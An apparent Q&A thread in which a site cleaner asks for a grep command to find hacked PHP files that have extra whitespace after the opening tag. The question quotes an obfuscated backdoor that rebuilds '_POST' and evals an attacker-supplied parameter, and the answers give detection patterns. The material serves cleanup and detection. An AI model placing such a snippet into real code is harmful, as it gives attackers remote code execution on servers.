# Find all php files that has more than 2 white spaces after the opening PHP tag

Tags: php, regex

The current position I'm in has me cleaning hacked sites all day long.  I managed to get shell access on the main server, so I can can run some quick commands to isolate the offending files and remove them.

Here's an example of an offending file:

```
"php                                    $uzi51="otpres_u"; $zlg07= $uzi51[5]. $uzi51[1]. $uzi51[3]. $uzi51[1].$uzi51[0]. $uzi51[7].$uzi51[2]. $uzi51[2]. $uzi51[4]. $uzi51[3];$rpu17=$zlg07 ($uzi51[6].$uzi51[2].$uzi51[0]. $uzi51[5]. $uzi51[1] ) ; if( isset( ${ $rpu17 }[ 'q635689'] )){ eval( ${$rpu17}['q635689' ] ) ;}
```

This is typical behavior for these types of exploits.  Opening php tag then ALWAYS more than 2 white spaces.

The command I tried:

```
grep -rl '\?php[ ]{2,}()' directory/
```

I built the regex using this site:  https://regex101.com/#pcre
Which shows a perfect match on the code I pasted above.  But shows nothing at the command line when I integrate into grep.
I've also tried:

```
pcregrep -rM '\?php[\s]+[^\S]*$' *.php
```

Completely stuck at this point.

Any help or guidance is appreciated.

Comment: You wrote: *The current position I'm in has me cleaning hacked sites all day long*. Shouldn't they do something to prevent from getting hacked?

Answer (score 4, accepted):

I would use this:

```
grep -r '<?php \{3,\}'
```

It matches `<?php` followed by 3 or more white spaces.

Comment: Perfect.  I tried to up vote, but I don't have enough points.

Answer (score 1):

Add the `-P` flag to your `grep` command. It tells grep to use perl regex.

```
grep -Prl '\?php[ ]{2,}()' directory/
```

From `man grep`

> -P
>
> --perl-regexp
>
> Interpret the pattern as a Perl regular expression. This is highly
> experimental and ‘grep -P’ may warn of unimplemented
> features.

Comment: This didn't work on my local machine, but worked great on Cent.  I'd up vote, but I don't have enough freaking points yet.